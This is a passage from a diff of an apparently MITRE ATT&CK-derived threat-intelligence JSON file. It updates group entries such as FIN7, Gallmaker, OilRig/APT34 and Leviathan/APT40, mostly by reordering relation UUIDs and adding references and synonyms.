"dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9626,7 +11633,35 @@ "type": "uses" }, { - "dest-uuid": "72f54d66-675d-4587-9bd3-4ed09f9522e4", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4f6aa78c-c3d4-4883-9840-96ca2f5d6d47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9636,6 +11671,72 @@ "uuid": "3753cc21-2dae-4dfb-8481-d004e74502cc", "value": "FIN7 - G0046" }, + { + "description": "[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.(Citation: Symantec Gallmaker Oct 2018)", + "meta": { + "external_id": "G0084", + "refs": [ + "https://attack.mitre.org/groups/G0084", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group" + ], + "synonyms": [ + "Gallmaker" + ] + }, + "related": [ + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "2fd2be6a-d3a2-4a65-b499-05ea2693abee", + "value": "Gallmaker - G0084" + }, { "description": "[RTM](https://attack.mitre.org/groups/G0048) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://attack.mitre.org/software/S0148)). (Citation: ESET RTM Feb 2017)", "meta": { @@ -9668,7 +11769,7 @@ "value": "RTM - G0048" }, { - "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a threat group with suspected Iranian origins that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017) This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a threat group with suspected Iranian origins that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.", "meta": { "external_id": "G0049", "refs": [ @@ -9677,13 +11778,15 @@ "http://www.clearskysec.com/oilrig/", "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://pan-unit42.github.io/playbook_viewer/", "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", - "https://pan-unit42.github.io/playbook_viewer/" + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/" ], "synonyms": [ "OilRig", - "Helix Kitten", + "IRN2", + "HELIX KITTEN", "APT34" ] }, @@ -9717,35 +11820,7 @@ "type": "uses" }, { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9759,56 +11834,7 @@ "type": "uses" }, { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9eec47e-98f4-4b3c-b574-3fa8a87ebe05", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9822,84 +11848,21 @@ "type": "uses" }, { - "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "dest-uuid": "b9eec47e-98f4-4b3c-b574-3fa8a87ebe05", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "eff1a885-6f90-42a1-901f-eef6e7a1905e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8e101fdd-9f7f-4916-bb04-6bd9e94c129c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0998045d-f96e-4284-95ce-3c8219707486", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9913,49 +11876,7 @@ "type": "uses" }, { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9969,14 +11890,7 @@ "type": "uses" }, { - "dest-uuid": "cf23bf4a-e003-4116-bbae-1ea6c558d565", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9990,98 +11904,21 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e6c2a9d-9dc1-4eb0-b27c-91e8076a9d77", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10095,7 +11932,182 @@ "type": "uses" }, { - "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0998045d-f96e-4284-95ce-3c8219707486", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8e101fdd-9f7f-4916-bb04-6bd9e94c129c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "09b2cd76-c674-47cc-9f57-d2f2ad150a46", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "eff1a885-6f90-42a1-901f-eef6e7a1905e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10109,7 +12121,112 @@ "type": "uses" }, { - "dest-uuid": "09b2cd76-c674-47cc-9f57-d2f2ad150a46", + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cf23bf4a-e003-4116-bbae-1ea6c558d565", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e6c2a9d-9dc1-4eb0-b27c-91e8076a9d77", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d5268dfb-ae2b-4e0e-ac07-02a460613d8a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10205,10 +12322,13 @@ "refs": [ "https://attack.mitre.org/groups/G0065", "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html" ], "synonyms": [ "Leviathan", + "TEMP.Jumper", + "APT40", "TEMP.Periscope" ] }, @@ -10227,27 +12347,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "94379dec-5c87-49db-b36e-66abc0b81344", "tags": [ @@ -10255,34 +12354,6 @@ ], "type": "uses" }, - { - "dest-uuid": "64764dc6-a032-495f-8250-1e4c06bdc163", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -10291,7 +12362,7 @@ "type": "uses" }, { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "dest-uuid": "64764dc6-a032-495f-8250-1e4c06bdc163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10304,27 +12375,6 @@ ], "type": "uses" }, - { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ @@ -10332,27 +12382,6 @@ ], "type": "uses" }, - { - "dest-uuid": "705f0783-5f7d-4491-b6b7-9628e6e006d2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5a3a31fe-5a8f-48e1-bff0-a753e5b1be70", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", "tags": [ @@ -10361,21 +12390,7 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "dest-uuid": "705f0783-5f7d-4491-b6b7-9628e6e006d2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10395,13 +12410,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ @@ -10409,6 +12417,20 @@ ], "type": "uses" }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ @@ -10416,6 +12438,90 @@ ], "type": "uses" }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5a3a31fe-5a8f-48e1-bff0-a753e5b1be70", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "06d735e7-1db1-4dbe-ab4b-acbe419f902b", "tags": [ @@ -10429,6 